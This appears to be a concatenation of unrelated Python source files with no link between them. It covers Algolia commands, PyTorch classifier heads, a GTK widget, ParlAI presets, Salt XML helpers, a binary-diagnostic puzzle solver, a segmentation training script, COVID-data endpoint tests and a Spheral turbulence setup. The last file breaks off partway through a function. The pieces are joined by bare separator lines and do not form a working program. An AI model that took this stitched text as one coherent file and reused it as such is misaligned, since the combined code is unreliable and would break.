# python manage.py algolia_reindex: reindex all the registered models. This command first sends all the records to a temporary index and then moves it into place.
# You can pass the --model parameter to reindex a given model.
# python manage.py algolia_applysettings: (re)apply the index settings.
# python manage.py algolia_clearindex: clear the index
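# Illustrative invocation (the model name is just an example):
#   python manage.py algolia_reindex --model Product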
|
# encoding: utf-8
import torch.nn as nn
from torch.nn import functional as F
class SingleLinearClassifier(nn.Module):
def __init__(self, hidden_size, num_label):
super(SingleLinearClassifier, self).__init__()
self.num_label = num_label
self.classifier = nn.Linear(hidden_size, num_label)
def forward(self, input_features):
features_output = self.classifier(input_features)
return features_output
class MultiNonLinearClassifier(nn.Module):
def __init__(self, hidden_size, num_label, dropout_rate):
super(MultiNonLinearClassifier, self).__init__()
self.num_label = num_label
self.classifier1 = nn.Linear(hidden_size, hidden_size)
self.classifier2 = nn.Linear(hidden_size, num_label)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, input_features):
features_output1 = self.classifier1(input_features)
# features_output1 = F.relu(features_output1)
features_output1 = F.gelu(features_output1)
features_output1 = self.dropout(features_output1)
features_output2 = self.classifier2(features_output1)
return features_output2
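# Minimal usage sketch; the sizes below are illustrative and not from the original code.
if __name__ == "__main__":
    import torch
    clf = MultiNonLinearClassifier(hidden_size=768, num_label=5, dropout_rate=0.1)
    logits = clf(torch.randn(2, 128, 768))
    print(logits.shape)  # torch.Size([2, 128, 5])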
|
import gi, logging
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, Gio, GObject, GLib
from .account_tile import AccountTile
class AccountPane(Gtk.ScrolledWindow):
def __init__(self, model):
super().__init__()
self.model = model
self.flow_box = Gtk.FlowBox()
self.flow_box.set_orientation(Gtk.Orientation.HORIZONTAL)
self.flow_box.set_margin_top(25)
self.flow_box.set_margin_right(25)
self.flow_box.set_margin_bottom(25)
self.flow_box.set_margin_left(25)
self.flow_box.set_vexpand(False)
self.flow_box.set_vexpand_set(False)
self.flow_box.set_selection_mode(Gtk.SelectionMode.NONE)
self.flow_box.set_column_spacing(25)
self.flow_box.set_row_spacing(25)
self.flow_box.set_homogeneous(True)
self.add(self.flow_box)
self.update()
def update(self, new_transaction_ids=None):
for c in self.flow_box.get_children():
c.destroy()
for account in self.model.accounts():
self.flow_box.add(AccountTile(self.model, account))
self.flow_box.show_all()
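# Hypothetical usage sketch (a model object exposing an .accounts() iterable is assumed):
#   pane = AccountPane(model)
#   window.add(pane)
#   window.show_all()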
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
List of all opt presets distributed with ParlAI.
This file is for automatically generating docs.
"""
# PRESET_DESCRIPTIONS is a dictionary mapping alias names to human descriptions
# for the sake of documentation
PRESET_DESCRIPTIONS = {
"gen/meena": (
"Inference parameters for the Sample & Rank procedure of Meena. "
"See [Adiwardana et al. (2020)](https://arxiv.org/abs/2001.09977)."
),
"arch/blenderbot_3B": (
"Architecture parameters (number layers, etc) for BlenderBot 3B. See "
"[Roller et al. (2020)](https://arxiv.org/abs/2004.13637)"
),
"gen/blenderbot": (
"Beam search parameters for BlenderBot. See"
"[Roller et al. (2020)](https://arxiv.org/abs/2004.13637)"
),
}
|
"""
Various XML utilities
"""
import re
import string # pylint: disable=deprecated-module
from xml.etree import ElementTree
import salt.utils.data
import salt.utils.stringutils
def _conv_name(x):
"""
If this XML tree has an xmlns attribute, then etree will add it
to the beginning of the tag, like: "{http://path}tag".
"""
if "}" in x:
comps = x.split("}")
name = comps[1]
return name
return x
def _to_dict(xmltree):
"""
Converts an XML ElementTree to a dictionary that only contains items.
    This was the default behavior in version 2017.7 and remains the default to
    prevent unexpected parsing issues in modules that depend on it.
"""
# If this object has no children, the for..loop below will return nothing
# for it, so just return a single dict representing it.
if not xmltree:
name = _conv_name(xmltree.tag)
return {name: xmltree.text}
xmldict = {}
for item in xmltree:
name = _conv_name(item.tag)
if name not in xmldict:
if item:
xmldict[name] = _to_dict(item)
else:
xmldict[name] = item.text
else:
# If a tag appears more than once in the same place, convert it to
# a list. This may require that the caller watch for such a thing
# to happen, and behave accordingly.
if not isinstance(xmldict[name], list):
xmldict[name] = [xmldict[name]]
xmldict[name].append(_to_dict(item))
return xmldict
def _to_full_dict(xmltree):
"""
Returns the full XML dictionary including attributes.
"""
xmldict = {}
for attrName, attrValue in xmltree.attrib.items():
xmldict[attrName] = attrValue
if not xmltree:
if not xmldict:
# If we don't have attributes, we should return the value as a string
# ex: <entry>test</entry>
return xmltree.text
elif xmltree.text:
            # XML allows for empty sets with attributes, so we need to make sure that we capture this.
# ex: <entry name="test"/>
xmldict[_conv_name(xmltree.tag)] = xmltree.text
for item in xmltree:
name = _conv_name(item.tag)
if name not in xmldict:
xmldict[name] = _to_full_dict(item)
else:
# If a tag appears more than once in the same place, convert it to
# a list. This may require that the caller watch for such a thing
# to happen, and behave accordingly.
if not isinstance(xmldict[name], list):
xmldict[name] = [xmldict[name]]
xmldict[name].append(_to_full_dict(item))
return xmldict
def to_dict(xmltree, attr=False):
"""
Convert an XML tree into a dict. The tree that is passed in must be an
ElementTree object.
Args:
xmltree: An ElementTree object.
attr: If true, attributes will be parsed. If false, they will be ignored.
"""
if attr:
return _to_full_dict(xmltree)
else:
return _to_dict(xmltree)
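# Illustrative sketch of the conversion (element names are made up for the example):
#   tree = ElementTree.fromstring("<root><entry name='a'>text</entry></root>")
#   to_dict(tree)             -> {'entry': 'text'}
#   to_dict(tree, attr=True)  -> {'entry': {'name': 'a', 'entry': 'text'}}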
def get_xml_node(node, xpath):
"""
Get an XML node using a path (super simple xpath showing complete node ancestry).
This also creates the missing nodes.
The supported XPath can contain elements filtering using [@attr='value'].
Args:
node: an Element object
xpath: simple XPath to look for.
"""
if not xpath.startswith("./"):
xpath = "./{}".format(xpath)
res = node.find(xpath)
if res is None:
parent_xpath = xpath[: xpath.rfind("/")]
parent = node.find(parent_xpath)
if parent is None:
parent = get_xml_node(node, parent_xpath)
segment = xpath[xpath.rfind("/") + 1 :]
# We may have [] filter in the segment
matcher = re.match(
r"""(?P<tag>[^[]+)(?:\[@(?P<attr>\w+)=["'](?P<value>[^"']+)["']])?""",
segment,
)
attrib = (
{matcher.group("attr"): matcher.group("value")}
if matcher.group("attr") and matcher.group("value")
else {}
)
res = ElementTree.SubElement(parent, matcher.group("tag"), attrib)
return res
def set_node_text(node, value):
"""
    Function to use as the ``set`` value in the :py:func:`change_xml` mapping items to set the text.
This is the default.
:param node: the node to set the text to
:param value: the value to set
"""
node.text = str(value)
def clean_node(parent_map, node, ignored=None):
"""
    Remove the node from its parent if it has no attributes other than the ignored ones, no text and no children.
Recursively called up to the document root to ensure no empty node is left.
:param parent_map: dictionary mapping each node to its parent
:param node: the node to clean
:param ignored: a list of ignored attributes.
:return: True if anything has been removed, False otherwise
"""
has_text = node.text is not None and node.text.strip()
parent = parent_map.get(node)
removed = False
if (
len(node.attrib.keys() - (ignored or [])) == 0
and not list(node)
and not has_text
and parent
):
parent.remove(node)
removed = True
# Clean parent nodes if needed
if parent is not None:
parent_cleaned = clean_node(parent_map, parent, ignored)
removed = removed or parent_cleaned
return removed
def del_text(parent_map, node):
"""
Function to use as ``del`` value in the :py:func:`change_xml` mapping items to remove the text.
This is the default function.
Calls :py:func:`clean_node` before returning.
"""
parent = parent_map[node]
parent.remove(node)
    clean_node(parent_map, parent)
return True
def del_attribute(attribute, ignored=None):
"""
Helper returning a function to use as ``del`` value in the :py:func:`change_xml` mapping items to
remove an attribute.
The generated function calls :py:func:`clean_node` before returning.
:param attribute: the name of the attribute to remove
:param ignored: the list of attributes to ignore during the cleanup
:return: the function called by :py:func:`change_xml`.
"""
def _do_delete(parent_map, node):
if attribute not in node.keys():
return False
node.attrib.pop(attribute)
clean_node(parent_map, node, ignored)
return True
return _do_delete
def attribute(path, xpath, attr_name, ignored=None, convert=None):
"""
Helper function creating a change_xml mapping entry for a text XML attribute.
:param path: the path to the value in the data
:param xpath: the xpath to the node holding the attribute
:param attr_name: the attribute name
:param ignored: the list of attributes to ignore when cleaning up the node
:param convert: a function used to convert the value
"""
entry = {
"path": path,
"xpath": xpath,
"get": lambda n: n.get(attr_name),
"set": lambda n, v: n.set(attr_name, str(v)),
"del": salt.utils.xmlutil.del_attribute(attr_name, ignored),
}
if convert:
entry["convert"] = convert
return entry
def int_attribute(path, xpath, attr_name, ignored=None):
"""
Helper function creating a change_xml mapping entry for a text XML integer attribute.
:param path: the path to the value in the data
:param xpath: the xpath to the node holding the attribute
:param attr_name: the attribute name
:param ignored: the list of attributes to ignore when cleaning up the node
"""
return {
"path": path,
"xpath": xpath,
"get": lambda n: int(n.get(attr_name)) if n.get(attr_name) else None,
"set": lambda n, v: n.set(attr_name, str(v)),
"del": salt.utils.xmlutil.del_attribute(attr_name, ignored),
}
def change_xml(doc, data, mapping):
"""
    Change an XML ElementTree document according to a data structure and a mapping description.
:param doc: the ElementTree parsed XML document to modify
:param data: the dictionary of values used to modify the XML.
:param mapping: a list of items describing how to modify the XML document.
Each item is a dictionary containing the following keys:
.. glossary::
path
the path to the value to set or remove in the ``data`` parameter.
See :py:func:`salt.utils.data.get_value <salt.utils.data.get_value>` for the format
of the value.
xpath
Simplified XPath expression used to locate the change in the XML tree.
See :py:func:`get_xml_node` documentation for details on the supported XPath syntax
get
            function getting the value from the XML.
Takes a single parameter for the XML node found by the XPath expression.
Default returns the node text value.
This may be used to return an attribute or to perform value transformation.
set
function setting the value in the XML.
Takes two parameters for the XML node and the value to set.
Default is to set the text value.
del
function deleting the value in the XML.
Takes two parameters for the parent node and the node matched by the XPath.
Returns True if anything was removed, False otherwise.
Default is to remove the text value.
More cleanup may be performed, see the :py:func:`clean_node` function for details.
convert
function modifying the user-provided value right before comparing it with the one from the XML.
Takes the value as single parameter.
Default is to apply no conversion.
:return: ``True`` if the XML has been modified, ``False`` otherwise.
"""
need_update = False
for param in mapping:
# Get the value from the function parameter using the path-like description
# Using an empty list as a default value will cause values not provided by the user
# to be left untouched, as opposed to explicit None unsetting the value
values = salt.utils.data.get_value(data, param["path"], [])
xpath = param["xpath"]
# Prepend the xpath with ./ to handle the root more easily
if not xpath.startswith("./"):
xpath = "./{}".format(xpath)
placeholders = [
s[1:-1]
for s in param["path"].split(":")
if s.startswith("{") and s.endswith("}")
]
ctx = {placeholder: "$$$" for placeholder in placeholders}
all_nodes_xpath = string.Template(xpath).substitute(ctx)
all_nodes_xpath = re.sub(
r"""(?:=['"]\$\$\$["'])|(?:\[\$\$\$\])""", "", all_nodes_xpath
)
# Store the nodes that are not removed for later cleanup
kept_nodes = set()
for value_item in values:
new_value = value_item["value"]
# Only handle simple type values. Use multiple entries or a custom get for dict or lists
if isinstance(new_value, list) or isinstance(new_value, dict):
continue
if new_value is not None:
# We need to increment ids from arrays since xpath starts at 1
converters = {
p: (lambda n: n + 1)
if "[${}]".format(p) in xpath
else (lambda n: n)
for p in placeholders
}
ctx = {
placeholder: converters[placeholder](
value_item.get(placeholder, "")
)
for placeholder in placeholders
}
node_xpath = string.Template(xpath).substitute(ctx)
node = get_xml_node(doc, node_xpath)
kept_nodes.add(node)
get_fn = param.get("get", lambda n: n.text)
set_fn = param.get("set", set_node_text)
current_value = get_fn(node)
# Do we need to apply some conversion to the user-provided value?
convert_fn = param.get("convert")
if convert_fn:
new_value = convert_fn(new_value)
# Allow custom comparison. Can be useful for almost equal numeric values
compare_fn = param.get("equals", lambda o, n: str(o) == str(n))
if not compare_fn(current_value, new_value):
set_fn(node, new_value)
need_update = True
else:
nodes = doc.findall(all_nodes_xpath)
del_fn = param.get("del", del_text)
parent_map = {c: p for p in doc.iter() for c in p}
for node in nodes:
deleted = del_fn(parent_map, node)
need_update = need_update or deleted
# Clean the left over XML elements if there were placeholders
if placeholders and [v for v in values if v.get("value") != []]:
all_nodes = set(doc.findall(all_nodes_xpath))
to_remove = all_nodes - kept_nodes
del_fn = param.get("del", del_text)
parent_map = {c: p for p in doc.iter() for c in p}
for node in to_remove:
deleted = del_fn(parent_map, node)
need_update = need_update or deleted
return need_update
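# Illustrative sketch of a change_xml call (element and data names are hypothetical;
# salt.utils.data.get_value is assumed to resolve "path" into the list of
# {"value": ...} matches that the loop above iterates over):
#   changed = change_xml(
#       doc,
#       {"memory": 1024},
#       [{"path": "memory", "xpath": "memory", "convert": str}],
#   )
# This creates or updates a <memory> element under the document root and returns
# True only if its text actually changed.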
def strip_spaces(node):
"""
Remove all spaces and line breaks before and after nodes.
This helps comparing XML trees.
:param node: the XML node to remove blanks from
:return: the node
"""
if node.tail is not None:
node.tail = node.tail.strip(" \t\n")
if node.text is not None:
node.text = node.text.strip(" \t\n")
try:
for child in node:
strip_spaces(child)
except RecursionError:
raise Exception("Failed to recurse on the node")
return node
def element_to_str(node):
"""
Serialize an XML node into a string
"""
return salt.utils.stringutils.to_str(ElementTree.tostring(node))
|
from cec15 import *
|
class Puzzle3:
def __init__(self, puzzle_input):
self.puzzle_input = puzzle_input
def calculate_gamma_epsilon(self):
gamma = ''
epsilon = ''
for i in range(len(self.puzzle_input[0])):
values = [x[i] for x in self.puzzle_input]
g = self.group(values)
gamma += max(g, key=g.get)
epsilon += min(g, key=g.get)
return int(gamma,2) * int(epsilon,2)
def calculate_gamma_epsilon_alternative(self):
gamma = ''
epsilon = ''
data = list(zip(*self.puzzle_input))
for i in range(len(data)):
g = self.group(data[i])
gamma += max(g, key=g.get)
epsilon += min(g, key=g.get)
return int(gamma,2) * int(epsilon,2)
def group(self, values):
d = {}
for x in values:
if d.get(x):
d[x] += 1
else:
d[x] = 1
return d
def calculate_lifesupport_rating(self):
o2_rating = self.calculate_rating('1', max)
co2_rating = self.calculate_rating('0', min)
return o2_rating*co2_rating
    def calculate_rating(self, tie_value, maxminfunc):
collection = self.puzzle_input
for i in range(len(self.puzzle_input)):
values = [x[i] for x in collection]
g = self.group(values)
            flag = tie_value if g.get('0') == g.get('1') else maxminfunc(g, key=g.get)
collection = [x for x in collection if x[i] == flag]
if len(collection) == 1:
return int(collection[0],2)
return int(collection[0],2)
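# Hypothetical usage sketch; the diagnostic report strings below are illustrative.
if __name__ == "__main__":
    puzzle = Puzzle3(["00100", "11110", "10110", "10111", "10101"])
    print(puzzle.calculate_gamma_epsilon())       # gamma rate * epsilon rate
    print(puzzle.calculate_lifesupport_rating())  # O2 rating * CO2 rating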
|
import datetime
import os
import torch
from torch import nn
from torch import optim
from torch.autograd import Variable
from torch.backends import cudnn
from torch.utils.data import DataLoader
from torchvision import transforms
from tensorboardX import SummaryWriter
from tqdm import tqdm
import joint_transforms
from config import msd_training_root, msd_testing_root
from config import backbone_path
from dataset import ImageFolder
from misc import AvgMeter, check_mkdir
from model.edge_cbam_x_ccl_wl import EDGE_CBAM_X_CCL
cudnn.benchmark = True
device_ids = [6, 7]
# device_ids = [2, 3, 4, 5]
# device_ids = [1, 0]
ckpt_path = './ckpt'
exp_name = 'EDGE_CBAM_X_CCL_WL'
# batch size of 8 with resolution of 416*416 is exactly OK for the GTX 1080Ti GPU
args = {
'epoch_num': 60,
'train_batch_size': 8,
'val_batch_size': 8,
'last_epoch': 0,
'lr': 1e-4,
'lr_decay': 0.9,
'weight_decay': 5e-4,
'momentum': 0.9,
'snapshot': '',
'scale': 512,
'save_point': [40, 50],
'add_graph': True,
'poly_train': True
}
# Path.
check_mkdir(ckpt_path)
check_mkdir(os.path.join(ckpt_path, exp_name))
vis_path = os.path.join(ckpt_path, exp_name, 'log')
check_mkdir(vis_path)
log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt')
writer = SummaryWriter(log_dir=vis_path, comment=exp_name)
# Transform Data.
joint_transform = joint_transforms.Compose([
joint_transforms.RandomRotate(),
joint_transforms.Resize((args['scale'], args['scale']))
])
val_joint_transform = joint_transforms.Compose([
joint_transforms.Resize((args['scale'], args['scale']))
])
img_transform = transforms.Compose([
transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])  # could perhaps be optimized.
])
target_transform = transforms.ToTensor()
# Prepare Data Set.
train_set = ImageFolder(msd_training_root, joint_transform, img_transform, target_transform)
print("Train set: {}".format(train_set.__len__()))
train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True)
val_set = ImageFolder(msd_testing_root, val_joint_transform, img_transform, target_transform)
print("Validation Set: {}".format(val_set.__len__()))
val_loader = DataLoader(val_set, batch_size=args['val_batch_size'], num_workers=8, shuffle=False)
# Loss Functions.
bce = nn.BCELoss().cuda(device_ids[0])
bce_logit = nn.BCEWithLogitsLoss().cuda(device_ids[0])
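# WL below is a hand-rolled, pixel-count-weighted BCE variant: the L1 term
# reweights the positive/negative log terms by the negative/positive pixel
# fractions of the ground truth, while the L2 term reweights them by the
# per-image false-negative/false-positive rates estimated from the prediction.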
class WL(nn.Module):
def __init__(self):
super(WL, self).__init__()
def forward(self, pred, truth):
# n c h w
N_p = torch.tensor(torch.sum(torch.sum(truth, -1), -1), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
N = torch.tensor(torch.numel(truth[0, :, :, :]), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(N_p)
N_n = N - N_p
pred_p = torch.where(pred.cpu() >= 0.5, torch.tensor(1.), torch.tensor(2.))
TP_mask = torch.where(pred_p == truth.cpu(), torch.tensor(1.), torch.tensor(0.))
TP = torch.tensor(torch.sum(torch.sum(TP_mask, -1), -1), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
pred_n = torch.where(pred.cpu() < 0.5, torch.tensor(1.), torch.tensor(2.))
TN_mask = torch.where(pred_n == (1 - truth.cpu()), torch.tensor(1.), torch.tensor(0.))
TN = torch.tensor(torch.sum(torch.sum(TN_mask, -1), -1), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
L1 = -(N_n / N) * (truth.cpu() * torch.log(pred.cpu())) - (N_p / N) * ((1 - truth.cpu()) * torch.log(1 - pred.cpu()))
L2 = -(1 - TP / N_p) * truth.cpu() * torch.log(pred.cpu()) - (1 - TN / N_n) * (1 - truth.cpu()) * torch.log(1 - pred.cpu())
return L1.mean() + L2.mean()
# # Loss Functions.
# class WL(nn.Module):
# def __init__(self):
# super(WL, self).__init__()
# self.threshold = 10.
#
# def forward(self, pred_logit, truth):
# pred = torch.sigmoid(pred_logit)
# batch_size =truth.size(0)
#
# truth_flat = truth.contiguous().view(batch_size, -1)
#
# N_p = truth_flat.sum(1)
# N_p = torch.where(N_p < self.threshold, torch.tensor(self.threshold).cuda(device_ids[0]), N_p)
# N_n = (1 - truth_flat).sum(1)
#
# w1 = N_n / N_p
# w1 = w1.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
#
# L1 = nn.BCELoss(w1)(pred, truth)
#
# pred_flat = pred.contiguous().view(batch_size, -1)
# pred_flat_bool = torch.where(pred_flat >= 0.5, torch.tensor(1.).cuda(device_ids[0]), torch.tensor(0.).cuda(device_ids[0]))
# TP = (pred_flat_bool * truth_flat).sum(1)
# TN = ((1 - pred_flat_bool) * (1 - truth_flat)).sum(1)
#
# w2 = (1 - (TP / N_p)) / (1 - (TN / N_n))
# w2 = w2.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
#
# L2 = nn.BCELoss(w2)(pred, truth)
#
# return L1.mean()
class EL(nn.Module):
def __init__(self):
super(EL, self).__init__()
def forward(self, pred, truth):
L = -10 * truth.cpu() * torch.log(pred.cpu()) - (1 - truth.cpu()) * torch.log(1 - pred.cpu())
return L.mean()
wl = WL().cuda(device_ids[0])
el = EL().cuda(device_ids[0])
def main():
print(args)
net = EDGE_CBAM_X_CCL().cuda(device_ids[0]).train()
if args['add_graph']:
writer.add_graph(net, input_to_model=torch.rand(
args['train_batch_size'], 3, args['scale'], args['scale']).cuda(device_ids[0]))
net = nn.DataParallel(net, device_ids=device_ids)
optimizer = optim.SGD([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': 1 * args['lr'], 'weight_decay': args['weight_decay']}
], momentum=args['momentum'])
if len(args['snapshot']) > 0:
print('training resumes from \'%s\'' % args['snapshot'])
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
optimizer.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '_optim.pth')))
optimizer.param_groups[0]['lr'] = 2 * args['lr']
optimizer.param_groups[1]['lr'] = args['lr']
open(log_path, 'w').write(str(args) + '\n\n')
train(net, optimizer)
writer.close()
def train(net, optimizer):
curr_iter = 1
for epoch in range(args['last_epoch'] + 1, args['last_epoch'] + 1 + args['epoch_num']):
loss_f4_record, loss_f3_record, loss_f2_record, loss_f1_record, \
loss_b4_record, loss_b3_record, loss_b2_record, loss_b1_record, \
loss_e_record, loss_fb_record, loss_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), \
AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), \
AvgMeter(), AvgMeter(), AvgMeter()
train_iterator = tqdm(train_loader, total=len(train_loader))
for data in train_iterator:
if args['poly_train']:
base_lr = args['lr'] * (1 - float(curr_iter) / (args['epoch_num'] * len(train_loader))) ** args['lr_decay']
optimizer.param_groups[0]['lr'] = 2 * base_lr
optimizer.param_groups[1]['lr'] = 1 * base_lr
inputs, labels, edges = data
batch_size = inputs.size(0)
inputs = Variable(inputs).cuda(device_ids[0])
labels = Variable(labels).cuda(device_ids[0])
edges = Variable(edges).cuda(device_ids[0])
optimizer.zero_grad()
predict_f4, predict_f3, predict_f2, predict_f1, \
predict_b4, predict_b3, predict_b2, predict_b1, predict_e, predict_fb = net(inputs)
loss_f4 = wl(predict_f4, labels)
loss_f3 = wl(predict_f3, labels)
loss_f2 = wl(predict_f2, labels)
loss_f1 = wl(predict_f1, labels)
# loss_b4 = wl(1 - torch.sigmoid(predict_b4), labels)
# loss_b3 = wl(1 - torch.sigmoid(predict_b3), labels)
# loss_b2 = wl(1 - torch.sigmoid(predict_b2), labels)
# loss_b1 = wl(1 - torch.sigmoid(predict_b1), labels)
loss_b4 = wl(1 - predict_b4, labels)
loss_b3 = wl(1 - predict_b3, labels)
loss_b2 = wl(1 - predict_b2, labels)
loss_b1 = wl(1 - predict_b1, labels)
loss_e = el(predict_e, edges)
loss_fb = wl(predict_fb, labels)
loss = loss_f4 + loss_f3 + loss_f2 + loss_f1 + \
loss_b4 + loss_b3 + loss_b2 + loss_b1 + loss_e + 8 * loss_fb
loss.backward()
optimizer.step()
loss_record.update(loss.data, batch_size)
loss_f4_record.update(loss_f4.data, batch_size)
loss_f3_record.update(loss_f3.data, batch_size)
loss_f2_record.update(loss_f2.data, batch_size)
loss_f1_record.update(loss_f1.data, batch_size)
loss_b4_record.update(loss_b4.data, batch_size)
loss_b3_record.update(loss_b3.data, batch_size)
loss_b2_record.update(loss_b2.data, batch_size)
loss_b1_record.update(loss_b1.data, batch_size)
loss_e_record.update(loss_e.data, batch_size)
loss_fb_record.update(loss_fb.data, batch_size)
if curr_iter % 50 == 0:
writer.add_scalar('Total loss', loss, curr_iter)
writer.add_scalar('f4 loss', loss_f4, curr_iter)
writer.add_scalar('f3 loss', loss_f3, curr_iter)
writer.add_scalar('f2 loss', loss_f2, curr_iter)
writer.add_scalar('f1 loss', loss_f1, curr_iter)
writer.add_scalar('b4 loss', loss_b4, curr_iter)
writer.add_scalar('b3 loss', loss_b3, curr_iter)
writer.add_scalar('b2 loss', loss_b2, curr_iter)
writer.add_scalar('b1 loss', loss_b1, curr_iter)
writer.add_scalar('e loss', loss_e, curr_iter)
writer.add_scalar('fb loss', loss_fb, curr_iter)
log = '[%3d], [f4 %.5f], [f3 %.5f], [f2 %.5f], [f1 %.5f] ' \
'[b4 %.5f], [b3 %.5f], [b2 %.5f], [b1 %.5f], [e %.5f], [fb %.5f], [lr %.6f]' % \
(epoch,
loss_f4_record.avg, loss_f3_record.avg, loss_f2_record.avg, loss_f1_record.avg,
loss_b4_record.avg, loss_b3_record.avg, loss_b2_record.avg, loss_b1_record.avg,
loss_e_record.avg, loss_fb_record.avg, base_lr)
train_iterator.set_description(log)
open(log_path, 'a').write(log + '\n')
curr_iter += 1
if epoch in args['save_point']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
net.cuda(device_ids[0])
if epoch >= args['epoch_num']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
print("Optimization Have Done!")
return
if __name__ == '__main__':
main()
|
import json
import aiohttp
from rki_covid_parser.const import DISTRICTS_URL, DISTRICTS_URL_RECOVERED, DISTRICTS_URL_NEW_CASES, DISTRICTS_URL_NEW_RECOVERED, DISTRICTS_URL_NEW_DEATHS
async def test_endpoint_districts():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL)
async def test_endpoint_districts_recovered():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_RECOVERED)
async def test_endpoint_districts_new_cases():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_NEW_CASES)
async def test_endpoint_districts_new_recovered():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_NEW_RECOVERED)
async def test_endpoint_districts_new_deaths():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_NEW_DEATHS)
async def _test_endpoint(url: str):
"""Test if given endpoint is returning data."""
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
assert response.status == 200
body = await response.text()
data = json.loads(body)
assert data is not None
assert type(data) == dict
assert "features" in data
assert len(data["features"]) > 0
for feature in data["features"]:
assert "attributes" in feature
|
#-------------------------------------------------------------------------------
# 3-D stirred box test
#
#
#-------------------------------------------------------------------------------
from math import *
from Spheral3d import *
from SpheralTestUtilities import *
from SpheralGnuPlotUtilities import *
from findLastRestart import *
from SpheralVisitDump import dumpPhysicsState
import mpi
from GenerateNodeDistribution3d import *
import os
import numpy as np
title("3-D stirred box turbulence test")
#-------------------------------------------------------------------------------
# Generic problem parameters
#-------------------------------------------------------------------------------
commandLine(seed = "lattice",
nsize = 100,
f_solenoidal = 0.66,
kmin = 1,
kmax = 50, #must be <= nsize/2
perturbEach = 1,
rho1 = 1.0,
eps1 = 0.0,
nPerh = 2.01,
gamma = 5.0/3.0,
mu = 1.0,
SVPH = False,
CRKSPH = False,
ASPH = False,
SPH = True, # This just chooses the H algorithm -- you can use this with CRKSPH for instance.
filter = 0.0, # CRKSPH filtering
Qconstructor = MonaghanGingoldViscosity,
#Qconstructor = TensorMonaghanGingoldViscosity,
linearConsistent = False,
fcentroidal = 0.0,
fcellPressure = 0.0,
boolReduceViscosity = False,
nh = 5.0,
aMin = 0.1,
aMax = 2.0,
Qhmult = 1.0,
Cl = 1.0,
Cq = 1.0,
linearInExpansion = False,
Qlimiter = False,
balsaraCorrection = False,
epsilon2 = 1e-2,
hmin = 0.0001,
hmax = 0.5,
hminratio = 0.1,
cfl = 0.5,
useVelocityMagnitudeForDt = False,
XSPH = False,
epsilonTensile = 0.0,
nTensile = 8,
IntegratorConstructor = CheapSynchronousRK2Integrator,
goalTime = 2.0,
steps = None,
vizCycle = None,
vizTime = 0.1,
dt = 0.0001,
dtMin = 1.0e-8,
dtMax = 0.1,
dtGrowth = 2.0,
maxSteps = None,
statsStep = 10,
smoothIters = 0,
HUpdate = IdealH,
domainIndependent = False,
rigorousBoundaries = False,
dtverbose = False,
densityUpdate = RigorousSumDensity, # VolumeScaledDensity,
compatibleEnergy = True, # <--- Important! rigorousBoundaries does not work with the compatibleEnergy algorithm currently.
gradhCorrection = False,
useVoronoiOutput = False,
clearDirectories = False,
restoreCycle = None,
restartStep = 100,
redistributeStep = 500,
checkRestart = False,
dataDir = "stir-3d",
outputFile = "None",
comparisonFile = "None",
serialDump = False, #whether to dump a serial ascii file at the end for viz
)
# Decide on our hydro algorithm.
if SVPH:
if ASPH:
HydroConstructor = ASVPHFacetedHydro
else:
HydroConstructor = SVPHFacetedHydro
elif CRKSPH:
Qconstructor = LimitedMonaghanGingoldViscosity
if ASPH:
HydroConstructor = ACRKSPHHydro
else:
HydroConstructor = CRKSPHHydro
else:
if ASPH:
HydroConstructor = ASPHHydro
else:
HydroConstructor = SPHHydro
xmin = (0.0, 0.0, 0.0)
xmax = (1.0, 1.0, 1.0)
nx = nsize
ny = nsize
nz = nsize
n = [nx,ny,nz]
dataDir = os.path.join(dataDir,
"rho1=%g" % rho1,
str(HydroConstructor).split("'")[1].split(".")[-1],
"densityUpdate=%s" % (densityUpdate),
"compatibleEnergy=%s" % (compatibleEnergy),
"XSPH=%s" % XSPH,
"filter=%s" % filter,
"%s-Cl=%g-Cq=%g" % (str(Qconstructor).split("'")[1].split(".")[-1], Cl, Cq),
"%ix%ix%i" % (nx, ny, nz),
"nPerh=%g-Qhmult=%g" % (nPerh, Qhmult))
restartDir = os.path.join(dataDir, "restarts")
vizDir = os.path.join(dataDir, "visit")
restartBaseName = os.path.join(restartDir, "stir-3d")
vizBaseName = "stir-3d"
#-------------------------------------------------------------------------------
# Helper functions for the generation of perturbations
#-------------------------------------------------------------------------------
def init_perturbations(dtype):
kx = np.zeros(n, dtype=dtype)
ky = np.zeros(n, dtype=dtype)
kz = np.zeros(n, dtype=dtype)
# perform fft k-ordering convention shifts
for j in range(0,n[1]):
for k in range(0,n[2]):
kx[:,j,k] = n[0]*np.fft.fftfreq(n[0])
for i in range(0,n[0]):
for k in range(0,n[2]):
